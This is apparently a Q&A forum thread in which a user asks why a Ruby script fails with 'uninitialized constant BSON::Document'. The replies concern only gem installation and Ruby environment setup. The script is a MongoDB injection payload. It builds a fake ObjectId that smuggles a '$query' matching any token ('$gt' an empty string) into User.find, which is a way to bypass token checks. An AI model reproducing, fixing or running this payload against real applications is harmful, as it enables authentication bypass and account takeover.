# uninitialized constant BSON::Document

Tags: ruby, mongodb, exploit

I'm trying to execute ruby code on ubuntu 14.04 and while executing getting error,

**'': uninitialized constant BSON::Document (NameError)**

The code is,

```
#!/usr/bin/ruby
require 'uri'
require 'bson'
require 'mongo'
b = BSON::Document.new
b["$query"] = {"token" => {"$gt"=>""}}

payload = b.to_bson[4..-2]
id_ish = ("\n\n" + "a"*24 + "\n\n")

fake_id = "a"*24 +
  "\x02_id\0".unpack('H*')[0] +
  [id_ish.size/2 + 1].pack('V').unpack('H*')[0] + id_ish + "00" +
  payload.unpack('H*')[0]

puts URI.encode(fake_id)

User.find fake_id
```

I have gone through the documentation,
[BSON Tutorial](https://docs.mongodb.com/ruby-driver/master/tutorials/bson-v4/)

Any idea what i'm missing here. Any pointer would be appreciated.

Answer (score 0):

It looks like you are trying to execute this code “in vacuum.”

`require` method will silently return `false` unless succeeded. Also, to execute the code you need the respective gems to be installed. First of all, run

```
$ gem install bson
$ gem install mongo
```

in your shell. Now retry with your script. The gems above should make everything working fine. If not, you need to setup ruby environment, there are many tutorials on that.

There also could be an issue with system/local ruby (the hashbang line dictates to execute the system one.) Try to remove this line and run the script with

```
$ ruby script_name.rb
```

Comment: I already have the above mentioned packages installed, here is the 
gem query --local

*** LOCAL GEMS ***

bson (4.1.1)
mongo (2.3.1)
I will try your next option to configure ruby environment.

Comment: Wait. Maybe the problem is with system/local ruby. Try to remove the hashbang line (first one) from the script and execute it with `ruby FILE_NAME.rb`.

Comment: Removing hashbang doesn't help as well. May i ask how to check ruby environment is configured properly ? I am following https://www.digitalocean.com/community/tutorials/how-to-work-with-the-ruby-package-manager-rubygems-getting-started and other links mentioned on this uri.

Comment: I have solved the problem by installing latest version of ruby using source.
After solving that problem got another error,
<main>': undefined method `unpack' for #<BSON::ByteBuffer:0x007f9625c6fcd8> (NoMethodError)
However the unpack method is working fine on irb shell. Any clue ?